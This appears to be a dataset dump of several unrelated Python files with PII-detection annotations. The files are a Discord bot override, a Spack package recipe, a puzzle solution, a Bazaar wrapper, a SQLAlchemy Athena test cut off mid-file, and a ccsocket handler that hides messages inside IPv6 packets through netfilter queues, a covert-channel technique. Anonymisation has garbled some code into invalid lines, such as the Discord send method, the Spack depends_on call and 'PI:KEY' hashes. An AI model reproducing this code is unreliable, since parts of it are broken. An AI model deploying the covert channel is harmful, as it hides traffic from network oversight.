['URL', 'self.is'], ['URL', 'self.gr'], ['URL', 'self.si'], ['URL', 'self.date.st'], ['URL', 'self.pa'], ['URL', 'fs.gr'], ['URL', 'fs.si'], ['URL', 'fs.date.st'], ['URL', 'fs.pa'], ['URL', 'status.to'], ['URL', 'email.com'], ['URL', 're.ma'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'datetime.datetime.no'], ['URL', 'm.gr'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'os.path.jo'], ['URL', 'self.pa'], ['URL', 'self.pe'], ['URL', 'date.ye'], ['URL', 'date.mo'], ['URL', 'self.pa']]" +58,"# coding=utf-8 +""""""Overrides for Discord.py classes"""""" +import contextlib +import inspect +import io +import itertools +import re + +import discord +from discord.ext.commands import HelpFormatter as HelpF, Paginator, Command +from bot.utils import polr, privatebin + +from bot.utils.args import ArgParseConverter as ArgPC + + +def create_help(cmd, parser): + """"""Creates an updated usage for the help command"""""" + default = cmd.params['args'].default + if cmd.signature.split(""["")[-1] == f""args={default}]"" if default else ""args]"": + sio = io.StringIO() + with contextlib.redirect_stdout(sio): + parser.print_help() + sio.seek(0) + s = sio.read() + # Strip the filename and trailing newline from help text + arg_part = s[(len(str(s[7:]).split()[0]) + 8):-1] + k = cmd.qualified_name + spt = len(k.split()) + # Remove a duplicate command name + leading arguments + split_sig = cmd.signature.split()[spt:] + return ""["".join(("" "".join(split_sig)).split(""["")[:-1]) + arg_part + return cmd.usage + + +class HelpFormatter(HelpF): + """"""Custom override for the default help command"""""" + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self._paginator = None + + async def format(self): + """"""Handles the actual behaviour involved with formatting. + + To change the behaviour, this method should be overridden. + + Returns + -------- + list + A paginated output of the help command. + """""" + self._paginator = Paginator() + + # we need a padding of ~80 or so + + description = self.command.description if not self.is_cog() else inspect.getdoc(self.command) + + if description: + # portion + self._paginator.add_line(description, empty=True) + + if isinstance(self.command, Command): + # + if self.command.params.get(""args"", None) and type(self.command.params['args'].annotation) == ArgPC: + self.command.usage = create_help(self.command, self.command.params['args'].annotation.parser) + signature = self.get_command_signature() + self._paginator.add_line(signature, empty=True) + + # section + if self.command.help: + self._paginator.add_line(self.command.help, empty=True) + + # end it here if it's just a regular command + if not self.has_subcommands(): + self._paginator.close_page() + return self._paginator.pages + + max_width = self.max_name_size + + def category(tup): + """"""Splits the help command into categories for easier readability"""""" + cog = tup[1].cog_name + # we insert the zero width space there to give it approximate + # last place sorting position. + return cog + ':' if cog is not None else '\u200bNo Category:' + + filtered = await self.filter_command_list() + if self.is_bot(): + data = sorted(filtered, key=category) + for category, commands in itertools.groupby(data, key=category): + # there simply is no prettier way of doing this. 
+ commands = sorted(commands) + if len(commands) > 0: + self._paginator.add_line(category) + + self._add_subcommands_to_page(max_width, commands) + else: + filtered = sorted(filtered) + if filtered: + self._paginator.add_line('Commands:') + self._add_subcommands_to_page(max_width, filtered) + + # add the ending note + self._paginator.add_line() + ending_note = self.get_ending_note() + self._paginator.add_line(ending_note) + return self._paginator.pages + + +_mentions_transforms = { + '@everyone': '@\u200beveryone', + '@here': '@\u200bhere' +} + +_mention_pattern = re.compile('|'.join(_mentions_transforms.keys())) + + +def _is_submodule(parent, child): + return parent == child or child.startswith(parent + ""."") + + +async def _default_help_command(ctx, *commands: str): + """"""Shows this message."""""" + bot = ctx.bot + destination = ctx.message.author if bot.pm_help else ctx.message.channel + + def repl(obj): + return _mentions_transforms.get(obj.group(0), '') + + # help by itself just lists our own commands. + if len(commands) == 0: + pages = await bot.formatter.format_help_for(ctx, bot) + elif len(commands) == 1: + # try to see if it is a cog name + name = _mention_pattern.sub(repl, commands[0]) + command = None + if name in bot.cogs: + command = bot.cogs[name] + else: + command = bot.all_commands.get(name) + if command is None: + await destination.send(bot.command_not_found.format(name)) + return + + pages = await bot.formatter.format_help_for(ctx, command) + else: + name = _mention_pattern.sub(repl, commands[0]) + command = bot.all_commands.get(name) + if command is None: + await destination.send(bot.command_not_found.format(name)) + return + + for key in commands[1:]: + try: + key = _mention_pattern.sub(repl, key) + command = command.all_commands.get(key) + if command is None: + await destination.send(bot.command_not_found.format(key)) + return + except AttributeError: + await destination.send(bot.command_has_no_subcommands.format(command, key)) + return + + pages = await bot.formatter.format_help_for(ctx, command) + + if bot.pm_help is None: + characters = sum(map(len, pages)) + # modify destination based on length of pages. 
+ if characters > 1000: + destination = ctx.message.author + + for page in pages: + try: + await destination.send(page) + except discord.Forbidden: + destination = ctx.message.channel + await destination.send(page) + + +old_send = discord.abc.Messageable.send + + +async def send(self, content=None, **kwargs): + """"""Overrides default send method in order to create a paste if the response is more than 2000 characters"""""" + if content is not None and any(x in str(content) for x in [""@everyone"", ""@here""]): + content = content.replace(""@everyone"", dummy@email.com(""@here"", ""@h\u0435re"") + if content is not None and len(str(content)) > 2000: + if content.startswith(""```py""): + content = ""\n"".join(content.split(""\n"")[1:-1]) + paste = await privatebin.upload(content, expires=""15min"", server=self.bot.priv) + if self.bot.polr: + paste = await polr.shorten(paste, **self.bot.polr) + return await old_send(self, f""Hey, I couldn't handle all the text I was gonna send you, so I put it in a paste!"" + f""\nThe link is **{paste}**, but it expires in 15 minutes, so get it quick!"", + **kwargs) + else: + return await old_send(self, content, **kwargs) +",7157,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Discord.py'], ['PERSON', 'sio = io.'], ['PERSON', 'StringIO'], ['LOCATION', 'parser.print_help'], ['PERSON', 'self.is_cog'], ['PERSON', 'self.is_bot'], ['LOCATION', 'bot.pm_help'], ['LOCATION', 'bot.pm_help'], ['DATE_TIME', '15 minutes'], ['URL', 'Discord.py'], ['URL', 'discord.ext.com'], ['URL', 'bot.utils.ar'], ['URL', 'cmd.pa'], ['URL', 'cmd.si'], ['URL', 'io.St'], ['URL', 'contextlib.red'], ['URL', 'parser.pr'], ['URL', 'sio.se'], ['URL', 'sio.re'], ['URL', 'cmd.si'], ['URL', 'cmd.us'], ['URL', 'self.command.de'], ['URL', 'self.is'], ['URL', 'inspect.ge'], ['URL', 'self.com'], ['URL', 'paginator.ad'], ['URL', 'self.com'], ['URL', 'self.command.params.ge'], ['URL', 'self.command.pa'], ['URL', 'self.command.us'], ['URL', 'self.com'], ['URL', 'self.command.pa'], ['URL', '.annotation.pa'], ['URL', 'self.ge'], ['URL', 'paginator.ad'], ['URL', 'self.com'], ['URL', 'paginator.ad'], ['URL', 'self.com'], ['URL', 'paginator.cl'], ['URL', 'paginator.pa'], ['URL', 'self.ma'], ['URL', 'self.fi'], ['URL', 'self.is'], ['URL', 'itertools.gr'], ['URL', 'paginator.ad'], ['URL', 'paginator.ad'], ['URL', 'paginator.ad'], ['URL', 'self.ge'], ['URL', 'paginator.ad'], ['URL', 'paginator.pa'], ['URL', 're.com'], ['URL', 'transforms.ke'], ['URL', 'child.st'], ['URL', 'ctx.bo'], ['URL', 'ctx.message.au'], ['URL', 'bot.pm'], ['URL', 'ctx.message.ch'], ['URL', 'transforms.ge'], ['URL', 'obj.gr'], ['URL', 'bot.formatter.fo'], ['URL', 'pattern.su'], ['URL', 'bot.co'], ['URL', 'bot.co'], ['URL', 'bot.al'], ['URL', 'commands.ge'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'found.fo'], ['URL', 'bot.formatter.fo'], ['URL', 'pattern.su'], ['URL', 'bot.al'], ['URL', 'commands.ge'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'found.fo'], ['URL', 'pattern.su'], ['URL', 'command.al'], ['URL', 'commands.ge'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'found.fo'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'subcommands.fo'], ['URL', 'bot.formatter.fo'], ['URL', 'bot.pm'], ['URL', 'ctx.message.au'], ['URL', 'destination.se'], ['URL', 'discord.Fo'], ['URL', 'ctx.message.ch'], ['URL', 'destination.se'], ['URL', 'discord.abc.Messageable.se'], ['URL', 'content.re'], ['URL', 'email.com'], ['URL', 'content.st'], ['URL', 'self.bot.pr'], ['URL', 'self.bo'], ['URL', 'polr.sh'], 
['URL', 'self.bo']]" +59,"############################################################################## +# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC. +# Produced at the Lawrence Livermore National Laboratory. +# +# This file is part of Spack. +# Created by Todd Gamblin, dummy@email.com, All rights reserved. +# LLNL-CODE-647188 +# +# For details, see https://github.com/llnl/spack +# Please also see the NOTICE and LICENSE files for our notice and the LGPL. +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU Lesser General Public License (as +# published by the Free Software Foundation) version 2.1, February 1999. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and +# conditions of the GNU Lesser General Public License for more details. +# +# You should have received a copy of the GNU Lesser General Public +# License along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +############################################################################## +from spack import * + + +class RLimma(RPackage): + """"""Data analysis, linear models and differential expression + for microarray data."""""" + + homepage = ""https://www.bioconductor.org/packages/limma/"" + url = ""https://git.bioconductor.org/packages/limma"" + list_url = homepage + + version('3.32.10', git='https://git.bioconductor.org/packages/limma', commit='PI:KEY') + version('3.32.6', 'PI:KEY') + + depends_on(dummy@email.com', dummy@email.com') +",1694,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'https://git.bioconductor.org/packages/limma""'], ['URL', ""https://git.bioconductor.org/packages/limma',""], ['DATE_TIME', '2013-2017'], ['PERSON', 'Todd Gamblin'], ['DATE_TIME', 'February 1999'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['URL', 'https://github.com/llnl/spack'], ['URL', 'https://www.bioconductor.org/packages/limma/""'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com']]" +60,"#!/usr/bin/env python +# -*- coding: utf-8 -*- +''' +***************************************** +Author: zhlinh +Email: dummy@email.com +Version: 0.0.1 +Created Time: 2016-03-11 +Last_modify: 2016-03-11 +****************************************** +''' + +''' +Given a 2D board containing 'X' and 'O', +capture all regions surrounded by 'X'. + +A region is captured by flipping all 'O's +into 'X's in that surrounded region. + +For example, +X X X X +X O O X +X X O X +X O X X +After running your function, the board should be: + +X X X X +X X X X +X X X X +X O X X +''' + +class Solution(object): + def solve(self, board): + """""" + :type board: List[List[str]] + :rtype: void Do not return anything, modify board in-place instead. + """""" + m = len(board) + if m < 2: + return + n = len(board[0]) + for i in range(m): + self.helper(board, i, 0, m, n) + if n > 1: + self.helper(board, i, n - 1, m, n) + for j in range(n): + self.helper(board, 0, j, m, n) + if m > 1: + self.helper(board, m - 1, j, m, n) + for i in range(m): + for j in range(n): + if board[i][j] == 'O': + board[i][j] = 'X' + if board[i][j] == '1': + board[i][j] = 'O' + + def helper(self, board, i, j, m, n): + if board[i][j] == 'O': + board[i][j] = '1' + # trick here, normally it could be i >= 1. 
+# but the boundary will always get checked. +# so i == 1, then check 0 is duplicated. + if i > 1: + self.helper(board, i - 1, j, m, n) + if i < m - 2: + self.helper(board, i + 1, j, m, n) + if j > 1: + self.helper(board, i, j - 1, m, n) + if j < n - 2: + self.helper(board, i, j + 1, m, n) +",1908,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2016-03-11'], ['DATE_TIME', '2016-03-11'], ['URL', 'email.com']]" +61,"#!/usr/bin/python +# -*- coding: UTF-8 -*- +## This file is part of ccsocket +## Copyright (C) Tomas Dragoun dummy@email.com +## This program is published under a GPLv3 license +######################################################## + + +import nfqueue +import sys +import signal +from multiprocessing import Process, Pipe, Lock +from socket import AF_INET6 +from scapy.all import * +from scapy.layers.inet6 import ICMPv6Unknown +from headers import IPv6ExtHdrAH +from constants import Constants +

############################ +## ## +## NFQHandler ## +## ## +############################ +

class NFQHandler(Process): +#---------------------------------------------------------------------------------- + ''' + This class handles netfilter queue. Is connected with a parent process + via pipe. Messages are decoded and removed from incoming packets, data + are sent to pipe. In passive mode the queue intercepts both incoming and outgo- + ing traffic. Inherits multiprocessing.Process + ''' +#---------------------------------------------------------------------------------- + def __init__(self, encoder, pipe, sendevt, stopevt, proto, active, address): + ''' Call parent's constructor at first ''' + Process.__init__(self) # init parent (multiprocessing.Process) + self.name = 'NFQHandler-port ' + str(address[1]) + self.daemon = True # set process daemonic + ''' Initialize class attributes ''' + self._const = Constants() + self._encoder = encoder # encodes message in packet + self._pipe = pipe # exchange data with parent process via pipe + self._can_send = sendevt # event shared with parent process + self._stop_send = stopevt # event shared with parent process + self._proto = proto # upper-layer protocol + self._active = active # mode + self._host = address[0] + self._port = address[1] + ''' + Following steps prepare netfilter queue with _port as queue + number. There is always only one active queue associated + with given number. + ''' + self._queue = nfqueue.queue() # create queue + self._queue.open() # open queue + try: + self._queue.bind(AF_INET6) # set family type AF_INET6 + except: # fails when any other queue already runs + pass + self._queue.set_callback(self.handlepacket) # set queue callback + ''' + Final step raises RuntimeError in case there is some other + queue with the same number active, queue wasn't closed + properly or user's privileges are insufficient.
''' + try: + self._queue.create_queue(self._port) + except Exception, e: + raise e +#---------------------------------------------------------------------------------- + def __del__(self): + if self._pipe: # close connection with parent process + self._pipe.close() +#---------------------------------------------------------------------------------- + def destroyqueue(self): + ''' Attempts to close queue ''' + if self._queue: + #print 'stopping queue ' + str(self._port) + self._queue.close() # close queue + self._queue = None +#---------------------------------------------------------------------------------- + def _clear(self): + ''' Removes all data to send from pipe and sets state to idle ''' + while self._pipe.poll(): # clear pipe + self._pipe.recv() + self._can_send.set() + self._stop_send.clear() +#---------------------------------------------------------------------------------- + def run(self): + ''' + Runs endless loop. Every time a packet occurs in the queue the + _handlepacket method is called. + + ''' + #print 'starting queue ' + str(self._port) + self._queue.try_run() +#---------------------------------------------------------------------------------- + def handlepacket(self, number, payload): + ''' Queue callback function ''' + packet = IPv6(payload.get_data()) # decode packet from queue as IPv6 + ''' + Check if packet belongs to this queue - upperlayer ID field must match + in active mode. + ''' + modify, reroute = self._checkport(packet) + if not modify: + ''' + Reroute packet to correct queue. Verdict NF_QUEUE is 32-bit + number. Lower 16 bits code this verdict and upper 16 bits + are used to identify target queue. + ''' + if reroute != -1: + error = payload.set_verdict(nfqueue.NF_QUEUE | (reroute << 16)) + if not error: + return + ''' + Packet doesn't have icmp echo layer or target port isn't active, + accept packet + ''' + payload.set_verdict(nfqueue.NF_ACCEPT) + return + ''' + Port is ok, we need to check if address matches. Ip6tables rules filter + addresses, but packet might have been rerouted from other queue. + ''' + if len(self._host): # check source/destination address + if packet.src != self._host and packet.dst != self._host: + payload.set_verdict(nfqueue.NF_ACCEPT) + return + ''' + Nfqueue mark is used to distinguish between incoming and outgoing + packets. Each packet is marked. + ''' + mark = payload.get_nfmark() # get mark of this packet + if mark == 1: # incoming packet + self._incoming(packet, payload) + elif mark == 2: # outgoing packet + self._outgoing(packet, payload) +#---------------------------------------------------------------------------------- + def _incoming(self, packet, payload): + message = self._encoder.getmessage(packet) # decode message + if message is None: # no message + ''' Accept packet ''' + payload.set_verdict(nfqueue.NF_ACCEPT) + else: + ''' Remove message and pass modified packet to queue ''' + modified_packet = self._encoder.removemessage(packet) + payload.set_verdict_modified(nfqueue.NF_ACCEPT, + str(modified_packet), + len(modified_packet)) + try: + if not len(message): + return + except: + pass + self._pipe.send((message, (packet.src, self._port, 0, 0))) +#---------------------------------------------------------------------------------- + def _outgoing(self, packet, payload): + if self._stop_send.is_set(): + self._clear() + if self._pipe.poll(): # any data to send?
+ message = self._pipe.recv() # get message + ''' Encode message and return modified packet to queue ''' + modified_packet = self._encoder.addmessage(message, (packet, None)) + payload.set_verdict_modified(nfqueue.NF_ACCEPT, + str(modified_packet), + len(modified_packet)) + if not self._pipe.poll(): # sending finished + self._can_send.set() + else: # nothing to send, return packet to queue + payload.set_verdict(nfqueue.NF_ACCEPT) +#---------------------------------------------------------------------------------- + def _checkport(self, packet): + ''' + Returns tuple (bool, value). True, if packet belongs to this queue. In pa- + ssive mode always returns True. In active mode upperlayer id field must ma- + tch current _port number. Value is number of queue where will be packet re- + routed. + ''' + ''' Passive mode - override icmp id check ''' + if not self._active: + return (True, 0) + + ''' Active mode - check icmp (or fragment) id field (~ represents port) ''' + if packet.haslayer(ICMPv6EchoRequest): # upperlayer ICMPv6EchoRequest + id = packet[ICMPv6EchoRequest].id + elif packet.haslayer(ICMPv6EchoReply): # upperlayer ICMPv6EchoReply + id = packet[ICMPv6EchoReply].id + elif packet.haslayer(IPv6ExtHdrFragment): # fragmented packet + id = packet[IPv6ExtHdrFragment].id + elif packet.haslayer(ICMPv6Unknown) and packet.haslayer(IPv6ExtHdrAH): + type = packet[ICMPv6Unknown].type # ICMPv6 packet with AH + if type != 128 and type != 129: + return (False, -1) # accept packet + packet[IPv6ExtHdrAH].decode_payload_as(ICMPv6EchoRequest) + id = packet[ICMPv6EchoRequest].id + elif self._proto == self._const.PROTO_ALL: # any protocol + return (True, 0) # id matches port number + else: + return (False, -1) # accept packet + + if id == self._port: + return (True, 0) # id matches port number + else: + return (False, id) # reroute to correct queue +#---------------------------------------------------------------------------------- +",9616,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Tomas Dragoun'], ['PERSON', 'GPLv3'], ['LOCATION', '#'], ['LOCATION', '#'], ['LOCATION', 'stopevt'], ['PERSON', 'self._active'], ['PERSON', 'Verdict NF_QUEUE'], ['PERSON', 'upperlayer ICMPv6EchoRequest\n i'], ['PERSON', 'AH'], ['URL', 'email.com'], ['URL', 'scapy.al'], ['URL', 'scapy.layers.in'], ['URL', 'multiprocessing.Pro'], ['URL', 'multiprocessing.Pro'], ['URL', 'self.na'], ['URL', 'queue.bi'], ['URL', 'queue.se'], ['URL', 'queue.cr'], ['URL', 'pipe.cl'], ['URL', 'queue.cl'], ['URL', 'pipe.re'], ['URL', 'send.se'], ['URL', 'send.cl'], ['URL', 'queue.tr'], ['URL', 'payload.ge'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'packet.sr'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'payload.ge'], ['URL', 'encoder.ge'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'encoder.re'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'pipe.se'], ['URL', 'packet.sr'], ['URL', 'send.is'], ['URL', 'pipe.re'], ['URL', 'encoder.ad'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'send.se'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'const.PRO']]" +62,"############################################################################### +# Name: Cody Precord # +# Purpose: SourceControl implementation for Bazaar # +# Author: Cody Precord dummy@email.com # +# Copyright: (c) 2008 Cody Precord dummy@email.com # +# License: wxWindows License # +############################################################################### + +""""""Bazaar 
implementation of the SourceControl object """""" + +__author__ = ""Cody Precord dummy@email.com"" +__revision__ = ""$Revision: 867 $"" +__scid__ = ""$Id: BZR.py 867 2009-05-06 12:10:55Z CodyPrecord $"" + +#------------------------------------------------------------------------------# +# Imports +import os +import datetime +import re +import time + +# Local imports +from SourceControl import SourceControl, DecodeString + +#------------------------------------------------------------------------------# + +class BZR(SourceControl): + """""" Bazaar source control class """""" + name = 'Bazaar' + command = 'bzr' + ccache = list() # Cache of paths that are under bazaar control + repocache = dict() + + def __repr__(self): + return 'BZR.BZR()' + + def getAuthOptions(self, path): + """""" Get the repository authentication info """""" + output = [] + return output + + def getRepository(self, path): + """""" Get the repository of a given path """""" + if path in self.repocache: + return self.repocache[path] + + if not os.path.isdir(path): + root = os.path.split(path)[0] + else: + root = path + + while True: + if not root: + break + + if os.path.exists(os.path.join(root, '.bzr')): + break + else: + root = os.path.split(root)[0] + + # Cache the repo of this path for faster lookups next time + self.repocache[path] = root + return root + + def isControlled(self, path): + """""" Is the path controlled by BZR? """""" + t1 = time.time() + # Check for cached paths to speed up lookup + if path in self.ccache: + return True + + if not os.path.isdir(path): + root = os.path.split(path)[0] + else: + root = path + + last = False + while True: + if os.path.exists(os.path.join(root, '.bzr')): + # If a containing directory of the given path has a .bzr + # directory in it run status to find out if the file is being + # tracked or not. 
+ retval = False + out = self.run(root + os.sep, ['status', '-S', path]) + if out: + lines = out.stdout.readline() + if lines.startswith('?'): + fname = lines.split(None, 1)[1].strip() + fname = fname.rstrip(os.sep) + retval = not path.endswith(fname) + else: + retval = True + self.closeProcess(out) + + if retval: + self.ccache.append(path) + return retval + elif last: + break + else: + root, tail = os.path.split(root) + # If tail is None or '' then this has gotten to the root + # so mark it as the last run + if not tail: + last = True + + return False + + def add(self, paths): + """""" Add paths to the repository """""" + root, files = self.splitFiles(paths) + out = self.run(root, ['add'] + files) + self.logOutput(out) + self.closeProcess(out) + + def checkout(self, paths): + """""" Checkout files at the given path """""" + root, files = self.splitFiles(paths) + out = self.run(root, ['checkout',], files) + self.logOutput(out) + self.closeProcess(out) + + def commit(self, paths, message=''): + """""" Commit paths to the repository """""" + root, files = self.splitFiles(paths) + out = self.run(root, ['commit', '-m', message] + files) + self.logOutput(out) + self.closeProcess(out) + + def diff(self, paths): + """""" Run the diff program on the given files """""" + root, files = self.splitFiles(paths) + out = self.run(root, ['diff'] + files) + self.closeProcess(out) + + def makePatch(self, paths): + """""" Make a patch of the given paths """""" + root, files = self.splitFiles(paths) + patches = list() + for fname in files: + out = self.run(root, ['diff', fname]) + lines = [ line for line in out.stdout ] + self.closeProcess(out) + patches.append((fname, ''.join(lines))) + return patches + + def history(self, paths, history=None): + """""" Get the revision history of the given paths """""" + if history is None: + history = [] + + root, files = self.splitFiles(paths) + for fname in files: + out = self.run(root, ['log', fname]) + logstart = False + if out: + for line in out.stdout: + self.log(line) + if line.strip().startswith('-----------'): + logstart = False + current = dict(path=fname, revision=None, + author=None, date=None, log=u'') + history.append(current) + elif line.startswith('message:'): + logstart = True + elif logstart: + current['log'] += DecodeString(line) + elif line.startswith('revno:'): + current['revision'] = DecodeString(line.split(None, 1)[-1].strip()) + elif line.startswith('committer:'): + author = line.split(None, 1)[-1] + current['author'] = DecodeString(author.strip()) + elif line.startswith('timestamp:'): + date = line.split(None, 1)[-1] + current['date'] = self.str2datetime(date.strip()) + else: + pass + self.logOutput(out) + self.closeProcess(out) + return history + + def str2datetime(self, tstamp): + """""" Convert a timestamp string to a datetime object """""" + parts = tstamp.split() + ymd = [int(x.strip()) for x in parts[1].split('-')] + hms = [int(x.strip()) for x in parts[2].split(':')] + date = ymd + hms + return datetime.datetime(*date) + + def remove(self, paths): + """""" Recursively remove paths from repository """""" + root, files = self.splitFiles(paths) + out = self.run(root, ['remove', '--force'] + files) + self.logOutput(out) + + def status(self, paths, recursive=False, status=dict()): + """""" Get BZR status information from given file/directory """""" + codes = {' ':'uptodate', 'N':'added', 'C':'conflict', 'D':'deleted', + 'M':'modified'} + root, files = self.splitFiles(paths) + # -S gives output similar to svn which is a little easier to work with 
+ out = self.run(root, ['status', '-S'] + files) + repo = self.getRepository(paths[0]) + relpath = root.replace(repo, '', 1).lstrip(os.sep) + unknown = list() + if out: + for line in out.stdout: + self.log(line) + txt = line.lstrip(' +-') + + # Split the status code and relative file path + code, fname = txt.split(None, 1) + fname = fname.replace(u'/', os.sep).strip().rstrip(os.sep) + fname = fname.replace(relpath, '', 1).lstrip(os.sep) + code = code.rstrip('*') + + # Skip unknown files + if code == '?': + unknown.append(fname) + continue + + # Get the absolute file path + current = dict() + + try: + current['status'] = codes[code] + status[fname] = current + except KeyError: + pass + + # Find up to date files + unknown += status.keys() + for path in os.listdir(root): + if path not in unknown: + status[path] = dict(status='uptodate') + + self.logOutput(out) + return status + + def update(self, paths): + """""" Recursively update paths """""" + root, files = self.splitFiles(paths) + out = self.run(root, ['update'] + files) + self.logOutput(out) + + def revert(self, paths): + """""" Recursively revert paths to repository version """""" + root, files = self.splitFiles(paths) + if not files: + files = ['.'] + out = self.run(root, ['revert'] + files) + self.logOutput(out) + + def fetch(self, paths, rev=None, date=None): + """""" Fetch a copy of the paths' contents """""" + output = [] + for path in paths: + if os.path.isdir(path): + continue + root, files = self.splitFiles(path) + + options = [] + if rev: + options.append('-r') + options.append(str(rev)) + + if date: + # Date format YYYY-MM-DD,HH:MM:SS + options.append('-r') + options.append('date:%s' % date) + + out = self.run(root, ['cat'] + options + files) + if out: + output.append(out.stdout.read()) + self.logOutput(out) + else: + output.append(None) + return output +",9977,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Cody Precord '], ['PERSON', 'Cody Precord'], ['PERSON', 'Cody Precord'], ['PERSON', 'Cody Precord'], ['DATE_TIME', '2009-05-06'], ['LOCATION', 'self.ccache'], ['PERSON', 'fname = lines.split(None'], ['PERSON', 'fname'], ['PERSON', 'logstart'], ['PERSON', '= line.split(None'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'BZR.py'], ['URL', 'BZR.BZ'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'os.path.is'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'self.re'], ['URL', 'self.cc'], ['URL', 'os.path.is'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'self.ru'], ['URL', 'os.se'], ['URL', 'out.stdout.re'], ['URL', 'lines.st'], ['URL', 'fname.rs'], ['URL', 'os.se'], ['URL', 'self.cl'], ['URL', 'self.cc'], ['URL', 'os.pa'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'out.st'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'out.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'author.st'], ['URL', 'line.st'], ['URL', 'self.st'], ['URL', 'date.st'], ['URL', 'self.cl'], ['URL', 'x.st'], ['URL', 'x.st'], ['URL', 'self.ru'], ['URL', 'self.ru'], ['URL', 'self.ge'], ['URL', 'root.re'], ['URL', 'os.se'], ['URL', 'out.st'], ['URL', 'line.ls'], ['URL', 'fname.re'], ['URL', 'os.se'], ['URL', 'os.se'], ['URL', 'fname.re'], ['URL', 'os.se'], ['URL', 'code.rs'], ['URL', 
'status.ke'], ['URL', 'os.li'], ['URL', 'self.ru'], ['URL', 'self.ru'], ['URL', 'os.path.is'], ['URL', 'self.ru'], ['URL', 'out.stdout.re']]" +63,"# -*- coding: utf-8 -*- +import re +import unittest +import uuid +from datetime import date, datetime +from decimal import Decimal +from urllib.parse import quote_plus + +import numpy as np +import pandas as pd +import sqlalchemy +from sqlalchemy import String +from sqlalchemy.engine import create_engine +from sqlalchemy.exc import NoSuchTableError, OperationalError, ProgrammingError +from sqlalchemy.sql import expression +from sqlalchemy.sql.schema import Column, MetaData, Table +from sqlalchemy.sql.sqltypes import ( + BIGINT, + BINARY, + BOOLEAN, + DATE, + DECIMAL, + FLOAT, + INTEGER, + STRINGTYPE, + TIMESTAMP, +) + +from tests.conftest import ENV, SCHEMA +from tests.util import with_engine + + +class TestSQLAlchemyAthena(unittest.TestCase): + """"""Reference test case is following: + + https://github.com/dropbox/PyHive/blob/master/pyhive/tests/sqlalchemy_test_case.py + https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_hive.py + https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_presto.py + """""" + + def create_engine(self, **kwargs): + conn_str = ( + ""awsathena+rest://athena.{region_name}.amazonaws.com:443/"" + + ""{schema_name}?s3_staging_dir={s3_staging_dir}&s3_dir={s3_dir}"" + + ""&compression=snappy"" + ) + if ""verify"" in kwargs: + conn_str += ""&verify={verify}"" + if ""duration_seconds"" in kwargs: + conn_str += ""&duration_seconds={duration_seconds}"" + if ""poll_interval"" in kwargs: + conn_str += ""&poll_interval={poll_interval}"" + if ""kill_on_interrupt"" in kwargs: + conn_str += ""&kill_on_interrupt={kill_on_interrupt}"" + return create_engine( + conn_str.format( + region_name=ENV.region_name, + schema_name=SCHEMA, + s3_staging_dir=quote_plus(ENV.s3_staging_dir), + s3_dir=quote_plus(ENV.s3_staging_dir), + **kwargs + ) + ) + + @with_engine() + def test_basic_query(self, engine, conn): + rows = conn.execute(""SELECT * FROM one_row"").fetchall() + self.assertEqual(len(rows), 1) + self.assertEqual(rows[0].number_of_rows, 1) + self.assertEqual(len(rows[0]), 1) + + @with_engine() + def test_reflect_no_such_table(self, engine, conn): + self.assertRaises( + NoSuchTableError, + lambda: Table(""this_does_not_exist"", MetaData(bind=engine), autoload=True), + ) + self.assertRaises( + NoSuchTableError, + lambda: Table( + ""this_does_not_exist"", + MetaData(bind=engine), + schema=""also_does_not_exist"", + autoload=True, + ), + ) + + @with_engine() + def test_reflect_table(self, engine, conn): + one_row = Table(""one_row"", MetaData(bind=engine), autoload=True) + self.assertEqual(len(one_row.c), 1) + self.assertIsNotNone(one_row.c.number_of_rows) + + @with_engine() + def test_reflect_table_with_schema(self, engine, conn): + 